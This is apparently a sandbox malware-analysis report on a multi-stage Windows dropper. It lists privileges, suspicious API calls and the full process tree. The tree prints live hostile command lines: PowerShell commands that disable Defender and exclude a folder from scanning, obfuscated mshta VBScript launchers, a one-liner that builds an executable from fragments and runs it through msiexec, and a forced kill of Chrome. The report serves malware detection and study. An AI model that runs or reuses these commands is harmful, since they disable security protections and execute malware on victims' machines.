Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe | N/A
Token: SeCreatePermanentPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe | N/A
Token: SeAuditPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe | N/A
Token: SeChangeNotifyPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe | N/A
Token: SeSyncAgentPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe | N/A
Token: SeEnableDelegationPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe | N/A
Token: SeImpersonatePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe | N/A
Token: SeCreateGlobalPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe | N/A
Token: 31 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe | N/A
Token: 32 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe | N/A
Token: 33 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe | N/A
Token: 34 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe | N/A
Token: 35 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c78ded4d176ac.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19411ac950924ec3f.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A

Suspicious use of SendNotifyMessage

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2848 wrote to memory of 32 N/A C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 32 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe
PID 1460 wrote to memory of 4996 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 3124 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4996 wrote to memory of 1124 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3124 wrote to memory of 4504 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1460 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 4680 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 3960 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 756 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 3404 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\msiexec.exe
PID 1460 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 528 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c06f159e0ec.exe

Processes

C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe

"C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19879c4c0e.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19325eb008c0b950.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue195c40958f528163.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19f51bcd77a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19c06f159e0ec.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1993b3f72c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue193858933525b62.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19150ee2be694c8a4.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue192762f1cd058ddf8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19411ac950924ec3f.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19c78ded4d176ac.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19c1338f41ab.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19761b3b8d9d.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19b4ef3b53293fe.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1969586bcbf58493.exe

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c06f159e0ec.exe

Tue19c06f159e0ec.exe

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe

Tue19b4ef3b53293fe.exe

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c1338f41ab.exe

Tue19c1338f41ab.exe

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19325eb008c0b950.exe

Tue19325eb008c0b950.exe

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue195c40958f528163.exe

Tue195c40958f528163.exe

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue192762f1cd058ddf8.exe

Tue192762f1cd058ddf8.exe

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c78ded4d176ac.exe

Tue19c78ded4d176ac.exe

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19761b3b8d9d.exe

Tue19761b3b8d9d.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1460 -ip 1460

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue1969586bcbf58493.exe

Tue1969586bcbf58493.exe

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue1993b3f72c.exe

Tue1993b3f72c.exe

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19879c4c0e.exe

Tue19879c4c0e.exe

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19150ee2be694c8a4.exe

Tue19150ee2be694c8a4.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue193858933525b62.exe

Tue193858933525b62.exe

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19411ac950924ec3f.exe

Tue19411ac950924ec3f.exe

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19f51bcd77a.exe

Tue19f51bcd77a.exe

C:\Users\Admin\AppData\Local\Temp\is-8JCES.tmp\Tue19879c4c0e.tmp

"C:\Users\Admin\AppData\Local\Temp\is-8JCES.tmp\Tue19879c4c0e.tmp" /SL5="$70220,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19879c4c0e.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 632

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue193858933525b62.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue193858933525b62.exe"" ) do taskkill -iM ""%~nXx"" /f " , 0 , TRuE ) )

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19761b3b8d9d.exe

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19761b3b8d9d.exe

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue195c40958f528163.exe

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue195c40958f528163.exe

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19879c4c0e.exe

"C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19879c4c0e.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19f51bcd77a.exe

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19f51bcd77a.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue193858933525b62.exe" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "" == "" for %x In ( "C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue193858933525b62.exe") do taskkill -iM "%~nXx" /f

C:\Users\Admin\AppData\Local\Temp\is-4EH6A.tmp\Tue19879c4c0e.tmp

"C:\Users\Admin\AppData\Local\Temp\is-4EH6A.tmp\Tue19879c4c0e.tmp" /SL5="$6023A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19879c4c0e.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19761b3b8d9d.exe

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19761b3b8d9d.exe

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue195c40958f528163.exe

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue195c40958f528163.exe

C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe

~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 3332 -ip 3332

C:\Windows\SysWOW64\taskkill.exe

taskkill -iM "Tue193858933525b62.exe" /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3332 -s 360

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if ""-PyARgXd6fRp1GJRov7bdbpPssZBLJ "" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" ) do taskkill -iM ""%~nXx"" /f " , 0 , TRuE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "-PyARgXd6fRp1GJRov7bdbpPssZBLJ " == "" for %x In ( "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe") do taskkill -iM "%~nXx" /f

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBscrIpt: cLosE ( cREatEObjEcT ( "wscript.sHeLl" ). Run ( "cMD.ExE /R ECHO | seT /P = ""MZ"" > F3U_R.J & CoPy /B /Y F3U_R.J + RqC~~.A + TfSAy.w + y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E " , 0 , TruE ) )

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /R ECHO | seT /P = "MZ" >F3U_R.J & CoPy /B /Y F3U_R.J + RqC~~.A + TfSAy.w + y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ECHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>F3U_R.J"

C:\Windows\SysWOW64\msiexec.exe

msiexec -Y .\bENCc.E

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff9fec6cc40,0x7ff9fec6cc4c,0x7ff9fec6cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1908,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1904 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2164,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2412 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2208,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2436 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3140,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3160 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3280,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3292 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4552,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4508 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3688,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4716 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4476,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4840 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4984,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4992 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4732,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4728 /prefetch:8

C:\Windows\System32\WaaSMedicAgent.exe

C:\Windows\System32\WaaSMedicAgent.exe 8daacf5718a3a2b07d13512e330086bd YPWomczBPkCLgTIkGFcoPg.0.1.0.0.0

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

